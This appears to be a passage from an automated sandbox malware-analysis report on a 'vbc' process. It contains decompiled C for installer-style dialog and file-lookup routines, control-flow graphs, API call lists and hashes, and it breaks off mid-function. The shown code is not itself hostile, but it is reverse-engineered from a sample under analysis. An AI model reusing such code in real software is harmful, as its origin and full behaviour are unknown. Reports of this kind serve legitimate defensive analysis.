                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00000000
                                                0x00406f0b
                                                0x00406f09
                                                0x0040713e
                                                0x00000000
                                                0x00000000
                                                0x0040676d

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406555(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x426778); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x426778;
                                                			}




                                                0x00406560
                                                0x00406569
                                                0x00000000
                                                0x00406576
                                                0x0040656c
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(7556D4C4,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,7556D4C4,?,755513E0,00405A23,?,7556D4C4,755513E0), ref: 00406560
                                                • FindClose.KERNEL32(00000000), ref: 0040656C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: xgB
                                                • API String ID: 2295610775-399326502
                                                • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 255 403dfe-403e10 256 403f51-403f60 255->256 257 403e16-403e1c 255->257 259 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 256->259 260 403faf-403fc4 256->260 257->256 258 403e22-403e2b 257->258 263 403e40-403e43 258->263 264 403e2d-403e3a SetWindowPos 258->264 259->260 261 404004-404009 call 404322 260->261 262 403fc6-403fc9 260->262 274 40400e-404029 261->274 266 403fcb-403fd6 call 401389 262->266 267 403ffc-403ffe 262->267 269 403e45-403e57 ShowWindow 263->269 270 403e5d-403e63 263->270 264->263 266->267 288 403fd8-403ff7 SendMessageW 266->288 267->261 273 4042a3 267->273 269->270 275 403e65-403e7a DestroyWindow 270->275 276 403e7f-403e82 270->276 281 4042a5-4042ac 273->281 279 404032-404038 274->279 280 40402b-40402d call 40140b 274->280 282 404280-404286 275->282 284 403e84-403e90 SetWindowLongW 276->284 285 403e95-403e9b 276->285 291 404261-40427a DestroyWindow EndDialog 279->291 292 40403e-404049 279->292 280->279 282->273 289 404288-40428e 282->289 284->281 286 403ea1-403eb2 GetDlgItem 285->286 287 403f3e-403f4c call 40433d 285->287 293 403ed1-403ed4 286->293 294 403eb4-403ecb SendMessageW IsWindowEnabled 286->294 287->281 288->281 289->273 296 404290-404299 ShowWindow 289->296 291->282 292->291 297 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 292->297 298 403ed6-403ed7 293->298 299 403ed9-403edc 293->299 294->273 294->293 296->273 325 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 297->325 326 40409e-4040a3 297->326 302 403f07-403f0c call 4042af 298->302 303 403eea-403eef 299->303 304 403ede-403ee4 299->304 302->287 307 403f25-403f38 SendMessageW 303->307 309 403ef1-403ef7 303->309 304->307 308 403ee6-403ee8 304->308 307->287 308->302 313 403ef9-403eff call 40140b 309->313 314 403f0e-403f17 call 40140b 309->314 323 403f05 313->323 314->287 322 403f19-403f23 314->322 322->323 323->302 329 4040e4-4040e5 325->329 330 4040e7 325->330 326->325 331 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 329->331 330->331 332 404119-40412a SendMessageW 331->332 333 40412c 331->333 334 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 332->334 333->334 334->274 343 404176-404178 334->343 343->274 344 40417e-404182 343->344 345 4041a1-4041b5 DestroyWindow 344->345 346 404184-40418a 344->346 345->282 348 4041bb-4041e8 CreateDialogParamW 345->348 346->273 347 404190-404196 346->347 347->274 349 40419c 347->349 348->282 350 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 348->350 349->273 350->273 355 404247-40425f ShowWindow call 404322 350->355 355->282
                                                C-Code - Quality: 83%
                                                			E00403DFE(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                				struct HWND__* _v32;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t37;
                                                				signed int _t39;
                                                				signed int _t41;
                                                				struct HWND__* _t51;
                                                				signed int _t69;
                                                				struct HWND__* _t75;
                                                				signed int _t88;
                                                				struct HWND__* _t93;
                                                				signed int _t101;
                                                				int _t105;
                                                				signed int _t117;
                                                				signed int _t118;
                                                				int _t119;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				long _t132;
                                                				int _t134;
                                                				int _t135;
                                                				void* _t136;
                                                
                                                				_t117 = _a8;
                                                				if(_t117 == 0x110 || _t117 == 0x408) {
                                                					_t37 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t117 - 0x110;
                                                					 *0x423710 = _t37;
                                                					if(_t117 == 0x110) {
                                                						 *0x42a248 = _t127;
                                                						 *0x423724 = GetDlgItem(_t127, 1);
                                                						_t93 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x4216f0 = _t93;
                                                						E004042D6(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x429228);
                                                						 *0x42920c = E0040140B(4);
                                                						_t37 = 1;
                                                						__eflags = 1;
                                                						 *0x423710 = 1;
                                                					}
                                                					_t124 =  *0x40a39c; // 0x0
                                                					_t135 = 0;
                                                					_t132 = (_t124 << 6) +  *0x42a260;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L34:
                                                						E00404322(0x40b);
                                                						while(1) {
                                                							_t39 =  *0x423710;
                                                							 *0x40a39c =  *0x40a39c + _t39;
                                                							_t132 = _t132 + (_t39 << 6);
                                                							_t41 =  *0x40a39c; // 0x0
                                                							__eflags = _t41 -  *0x42a264;
                                                							if(_t41 ==  *0x42a264) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x42920c - _t135;
                                                							if( *0x42920c != _t135) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a39c -  *0x42a264; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t118 =  *(_t132 + 0x14);
                                                							E00406234(_t118, _t127, _t132, 0x43a000,  *((intOrPtr*)(_t132 + 0x24)));
                                                							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E004042D6(_t127);
                                                							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E004042D6(_t127);
                                                							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E004042D6(_t127);
                                                							_t51 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x42a2cc - _t135;
                                                							_v32 = _t51;
                                                							if( *0x42a2cc != _t135) {
                                                								_t118 = _t118 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t118;
                                                							}
                                                							ShowWindow(_t51, _t118 & 0x00000008); // executed
                                                							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
                                                							E004042F8(_t118 & 0x00000002);
                                                							_t119 = _t118 & 0x00000004;
                                                							EnableWindow( *0x4216f0, _t119);
                                                							__eflags = _t119 - _t135;
                                                							if(_t119 == _t135) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t135);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
                                                							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
                                                							__eflags =  *0x42a2cc - _t135;
                                                							if( *0x42a2cc == _t135) {
                                                								_push( *0x423724);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t135);
                                                								_push( *0x4216f0);
                                                							}
                                                							E0040430B();
                                                							E00406212(0x423728, 0x429240);
                                                							E00406234(0x423728, _t127, _t132,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t132 + 0x18)));
                                                							SetWindowTextW(_t127, 0x423728); // executed
                                                							_push(_t135);
                                                							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
                                                							__eflags = _t69;
                                                							if(_t69 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t132 - _t135;
                                                								if( *_t132 == _t135) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t132 + 4) - 5;
                                                								if( *(_t132 + 4) != 5) {
                                                									DestroyWindow( *0x429218); // executed
                                                									 *0x422700 = _t132;
                                                									__eflags =  *_t132 - _t135;
                                                									if( *_t132 <= _t135) {
                                                										goto L58;
                                                									}
                                                									_t75 = CreateDialogParamW( *0x42a240,  *_t132 +  *0x429220 & 0x0000ffff, _t127,  *( *(_t132 + 4) * 4 + "sD@"), _t132); // executed
                                                									__eflags = _t75 - _t135;
                                                									 *0x429218 = _t75;
                                                									if(_t75 == _t135) {
                                                										goto L58;
                                                									}
                                                									_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                									_push(6);
                                                									E004042D6(_t75);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
                                                									ScreenToClient(_t127, _t136 + 0x10);
                                                									SetWindowPos( *0x429218, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
                                                									_push(_t135);
                                                									E00401389( *((intOrPtr*)(_t132 + 0xc)));
                                                									__eflags =  *0x42920c - _t135;
                                                									if( *0x42920c != _t135) {
                                                										goto L61;
                                                									}
                                                									ShowWindow( *0x429218, 8);
                                                									E00404322(0x405);
                                                									goto L58;
                                                								}
                                                								__eflags =  *0x42a2cc - _t135;
                                                								if( *0x42a2cc != _t135) {
                                                									goto L61;
                                                								}
                                                								__eflags =  *0x42a2c0 - _t135;
                                                								if( *0x42a2c0 != _t135) {
                                                									continue;
                                                								}
                                                								goto L61;
                                                							}
                                                						}
                                                						DestroyWindow( *0x429218);
                                                						 *0x42a248 = _t135;
                                                						EndDialog(_t127,  *0x421ef8);
                                                						goto L58;
                                                					} else {
                                                						__eflags = _t37 - 1;
                                                						if(_t37 != 1) {
                                                							L33:
                                                							__eflags =  *_t132 - _t135;
                                                							if( *_t132 == _t135) {
                                                								goto L61;
                                                							}
                                                							goto L34;
                                                						}
                                                						_push(0);
                                                						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
                                                						__eflags = _t88;
                                                						if(_t88 == 0) {
                                                							goto L33;
                                                						}
                                                						SendMessageW( *0x429218, 0x40f, 0, 1);
                                                						__eflags =  *0x42920c;
                                                						return 0 |  *0x42920c == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t135 = 0;
                                                					if(_t117 == 0x47) {
                                                						SetWindowPos( *0x423708, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					if(_t117 == 5) {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x423708,  ~(_a12 - 1) & _t117); // executed
                                                					}
                                                					if(_t117 != 0x40d) {
                                                						__eflags = _t117 - 0x11;
                                                						if(_t117 != 0x11) {
                                                							__eflags = _t117 - 0x111;
                                                							if(_t117 != 0x111) {
                                                								L26:
                                                								return E0040433D(_t117, _a12, _a16);
                                                							}
                                                							_t134 = _a12 & 0x0000ffff;
                                                							_t128 = GetDlgItem(_t127, _t134);
                                                							__eflags = _t128 - _t135;
                                                							if(_t128 == _t135) {
                                                								L13:
                                                								__eflags = _t134 - 1;
                                                								if(_t134 != 1) {
                                                									__eflags = _t134 - 3;
                                                									if(_t134 != 3) {
                                                										_t129 = 2;
                                                										__eflags = _t134 - _t129;
                                                										if(_t134 != _t129) {
                                                											L25:
                                                											SendMessageW( *0x429218, 0x111, _a12, _a16);
                                                											goto L26;
                                                										}
                                                										__eflags =  *0x42a2cc - _t135;
                                                										if( *0x42a2cc == _t135) {
                                                											_t101 = E0040140B(3);
                                                											__eflags = _t101;
                                                											if(_t101 != 0) {
                                                												goto L26;
                                                											}
                                                											 *0x421ef8 = 1;
                                                											L21:
                                                											_push(0x78);
                                                											L22:
                                                											E004042AF();
                                                											goto L26;
                                                										}
                                                										E0040140B(_t129);
                                                										 *0x421ef8 = _t129;
                                                										goto L21;
                                                									}
                                                									__eflags =  *0x40a39c - _t135; // 0x0
                                                									if(__eflags <= 0) {
                                                										goto L25;
                                                									}
                                                									_push(0xffffffff);
                                                									goto L22;
                                                								}
                                                								_push(_t134);
                                                								goto L22;
                                                							}
                                                							SendMessageW(_t128, 0xf3, _t135, _t135);
                                                							_t105 = IsWindowEnabled(_t128);
                                                							__eflags = _t105;
                                                							if(_t105 == 0) {
                                                								goto L61;
                                                							}
                                                							goto L13;
                                                						}
                                                						SetWindowLongW(_t127, _t135, _t135);
                                                						return 1;
                                                					} else {
                                                						DestroyWindow( *0x429218);
                                                						 *0x429218 = _a12;
                                                						L58:
                                                						if( *0x425728 == _t135 &&  *0x429218 != _t135) {
                                                							ShowWindow(_t127, 0xa);
                                                							 *0x425728 = 1;
                                                						}
                                                						L61:
                                                						return 0;
                                                					}
                                                				}
                                                			}






























                                                0x00403e07
                                                0x00403e10
                                                0x00403f51
                                                0x00403f55
                                                0x00403f59
                                                0x00403f5b
                                                0x00403f60
                                                0x00403f6b
                                                0x00403f76
                                                0x00403f7b
                                                0x00403f7d
                                                0x00403f7f
                                                0x00403f82
                                                0x00403f87
                                                0x00403f95
                                                0x00403fa2
                                                0x00403fa9
                                                0x00403fa9
                                                0x00403faa
                                                0x00403faa
                                                0x00403faf
                                                0x00403fb5
                                                0x00403fbc
                                                0x00403fc2
                                                0x00403fc4
                                                0x00404004
                                                0x00404009
                                                0x0040400e
                                                0x0040400e
                                                0x00404013
                                                0x0040401c
                                                0x0040401e
                                                0x00404023
                                                0x00404029
                                                0x0040402d
                                                0x0040402d
                                                0x00404032
                                                0x00404038
                                                0x00000000
                                                0x00000000
                                                0x00404043
                                                0x00404049
                                                0x00000000
                                                0x00000000
                                                0x00404052
                                                0x0040405a
                                                0x0040405f
                                                0x00404062
                                                0x00404068
                                                0x0040406d
                                                0x00404070
                                                0x00404076
                                                0x0040407b
                                                0x0040407e
                                                0x00404084
                                                0x0040408c
                                                0x00404092
                                                0x00404098
                                                0x0040409c
                                                0x004040a3
                                                0x004040a3
                                                0x004040a3
                                                0x004040ad
                                                0x004040bf
                                                0x004040cb
                                                0x004040d0
                                                0x004040da
                                                0x004040e0
                                                0x004040e2
                                                0x004040e7
                                                0x004040e4
                                                0x004040e4
                                                0x004040e4
                                                0x004040f7
                                                0x0040410f
                                                0x00404111
                                                0x00404117
                                                0x0040412c
                                                0x00404119
                                                0x00404122
                                                0x00404124
                                                0x00404124
                                                0x00404132
                                                0x00404142
                                                0x00404158
                                                0x0040415f
                                                0x00404165
                                                0x00404169
                                                0x0040416e
                                                0x00404170
                                                0x00000000
                                                0x00404176
                                                0x00404176
                                                0x00404178
                                                0x00000000
                                                0x00000000
                                                0x0040417e
                                                0x00404182
                                                0x004041a7
                                                0x004041ad
                                                0x004041b3
                                                0x004041b5
                                                0x00000000
                                                0x00000000
                                                0x004041db
                                                0x004041e1
                                                0x004041e3
                                                0x004041e8
                                                0x00000000
                                                0x00000000
                                                0x004041ee
                                                0x004041f1
                                                0x004041f4
                                                0x0040420b
                                                0x00404217
                                                0x00404230
                                                0x00404236
                                                0x0040423a
                                                0x0040423f
                                                0x00404245
                                                0x00000000
                                                0x00000000
                                                0x0040424f
                                                0x0040425a
                                                0x00000000
                                                0x0040425a
                                                0x00404184
                                                0x0040418a
                                                0x00000000
                                                0x00000000
                                                0x00404190
                                                0x00404196
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040419c
                                                0x00404170
                                                0x00404267
                                                0x00404273
                                                0x0040427a
                                                0x00000000
                                                0x00403fc6
                                                0x00403fc6
                                                0x00403fc9
                                                0x00403ffc
                                                0x00403ffc
                                                0x00403ffe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ffe
                                                0x00403fcb
                                                0x00403fcf
                                                0x00403fd4
                                                0x00403fd6
                                                0x00000000
                                                0x00000000
                                                0x00403fe6
                                                0x00403fee
                                                0x00000000
                                                0x00403ff4
                                                0x00403e22
                                                0x00403e22
                                                0x00403e26
                                                0x00403e2b
                                                0x00403e3a
                                                0x00403e3a
                                                0x00403e43
                                                0x00403e4c
                                                0x00403e57
                                                0x00403e57
                                                0x00403e63
                                                0x00403e7f
                                                0x00403e82
                                                0x00403e95
                                                0x00403e9b
                                                0x00403f3e
                                                0x00000000
                                                0x00403f47
                                                0x00403ea1
                                                0x00403eae
                                                0x00403eb0
                                                0x00403eb2
                                                0x00403ed1
                                                0x00403ed1
                                                0x00403ed4
                                                0x00403ed9
                                                0x00403edc
                                                0x00403eec
                                                0x00403eed
                                                0x00403eef
                                                0x00403f25
                                                0x00403f38
                                                0x00000000
                                                0x00403f38
                                                0x00403ef1
                                                0x00403ef7
                                                0x00403f10
                                                0x00403f15
                                                0x00403f17
                                                0x00000000
                                                0x00000000
                                                0x00403f19
                                                0x00403f05
                                                0x00403f05
                                                0x00403f07
                                                0x00403f07
                                                0x00000000
                                                0x00403f07
                                                0x00403efa
                                                0x00403eff
                                                0x00000000
                                                0x00403eff
                                                0x00403ede
                                                0x00403ee4
                                                0x00000000
                                                0x00000000
                                                0x00403ee6
                                                0x00000000
                                                0x00403ee6
                                                0x00403ed6
                                                0x00000000
                                                0x00403ed6
                                                0x00403ebc
                                                0x00403ec3
                                                0x00403ec9
                                                0x00403ecb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ecb
                                                0x00403e87
                                                0x00000000
                                                0x00403e65
                                                0x00403e6b
                                                0x00403e75
                                                0x00404280
                                                0x00404286
                                                0x00404293
                                                0x00404299
                                                0x00404299
                                                0x004042a3
                                                0x00000000
                                                0x004042a3
                                                0x00403e63

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                • ShowWindow.USER32(?), ref: 00403E57
                                                • DestroyWindow.USER32 ref: 00403E6B
                                                • SetWindowLongW.USER32 ref: 00403E87
                                                • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                • GetDlgItem.USER32(?,00000001), ref: 00403F71
                                                • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
                                                • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
                                                • EnableWindow.USER32(?,?), ref: 004040DA
                                                • GetSystemMenu.USER32 ref: 004040F0
                                                • EnableMenuItem.USER32 ref: 004040F7
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                • SetWindowTextW.USER32 ref: 0040415F
                                                • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: (7B
                                                • API String ID: 3282139019-3251261122
                                                • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 403a5b-403a73 call 4065ec 361 403a75-403a85 call 406159 358->361 362 403a87-403abe call 4060df 358->362 369 403ae1-403b0a call 403d31 call 405cce 361->369 367 403ac0-403ad1 call 4060df 362->367 368 403ad6-403adc lstrcatW 362->368 367->368 368->369 376 403b10-403b15 369->376 377 403b9c-403ba4 call 405cce 369->377 376->377 378 403b1b-403b43 call 4060df 376->378 383 403bb2-403bd7 LoadImageW 377->383 384 403ba6-403bad call 406234 377->384 378->377 385 403b45-403b49 378->385 387 403c58-403c60 call 40140b 383->387 388 403bd9-403c09 RegisterClassW 383->388 384->383 390 403b5b-403b67 lstrlenW 385->390 391 403b4b-403b58 call 405bf3 385->391 399 403c62-403c65 387->399 400 403c6a-403c75 call 403d31 387->400 392 403d27 388->392 393 403c0f-403c53 SystemParametersInfoW CreateWindowExW 388->393 397 403b69-403b77 lstrcmpiW 390->397 398 403b8f-403b97 call 405bc6 call 406212 390->398 391->390 396 403d29-403d30 392->396 393->387 397->398 403 403b79-403b83 GetFileAttributesW 397->403 398->377 399->396 411 403c7b-403c95 ShowWindow call 40657c 400->411 412 403cfe-403d06 call 405444 400->412 404 403b85-403b87 403->404 405 403b89-403b8a call 405c12 403->405 404->398 404->405 405->398 419 403ca1-403cb3 GetClassInfoW 411->419 420 403c97-403c9c call 40657c 411->420 417 403d20-403d22 call 40140b 412->417 418 403d08-403d0e 412->418 417->392 418->399 421 403d14-403d1b call 40140b 418->421 424 403cb5-403cc5 GetClassInfoW RegisterClassW 419->424 425 403ccb-403cee DialogBoxParamW call 40140b 419->425 420->419 421->399 424->425 429 403cf3-403cfc call 4039ab 425->429 429->396
                                                C-Code - Quality: 96%
                                                			E00403A5B(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x42a250;
                                                				_t22 = E004065EC(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
